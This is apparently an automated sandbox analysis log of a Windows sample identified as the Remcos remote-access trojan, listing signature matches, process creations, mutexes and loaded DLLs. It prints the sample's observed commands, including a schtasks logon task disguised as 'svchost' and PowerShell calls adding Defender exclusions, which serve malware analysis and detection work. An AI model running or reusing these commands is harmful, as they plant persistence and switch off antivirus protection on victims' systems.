              Source: Process Memory Space: svchost.exe PID: 7964, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 8048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: csc.exe PID: 8164, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: ngen.exe PID: 7544, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 1072, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: wmplayer.exe PID: 2052, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: svchost.exe PID: 7920, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: LisectAVT_2403002A_136.exe, -----.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: svchost.exe.0.dr, -----.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
              Source: svchost.exe, 00000009.00000002.1561626202.00000138988D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1520490428.0000013F3D2B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
              Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@79/63@5/2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_00415C90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,19_2_00415C90
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,29_2_00415C90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,13_2_0040E2E7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,13_2_00419493
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00418A00
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeFile created: C:\Users\user\AppData\Roaming\svchost.exeJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8048
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1072
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7848:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7964
              Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7920
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMutant created: \Sessions\1\BaseNamedObjects\72626-GNX3E4
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeFile created: C:\Users\user\AppData\Local\Temp\tmpD64D.tmpJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD64D.tmp.bat""
              Source: LisectAVT_2403002A_136.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: LisectAVT_2403002A_136.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeFile read: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_136.exe "C:\Users\user\Desktop\LisectAVT_2403002A_136.exe"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD64D.tmp.bat""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 464 -p 7964 -ip 7964
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 8048 -ip 8048
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 8048 -ip 8048
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 1072 -ip 1072
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1072 -s 1424
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7964 -ip 7964
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 516 -p 7920 -ip 7920
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7920 -s 1128
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpD64D.tmp.bat""Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -ForceJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 464 -p 7964 -ip 7964
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 8048 -ip 8048
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 552 -p 8048 -ip 8048
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8048 -s 1176
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 1072 -ip 1072
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1072 -s 1424
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 548 -p 7964 -ip 7964
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7964 -s 1196
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 516 -p 7920 -ip 7920
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7920 -s 1128
              Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
              Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
              Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
              Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
              Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\svchost.exe" -Force
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
              Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
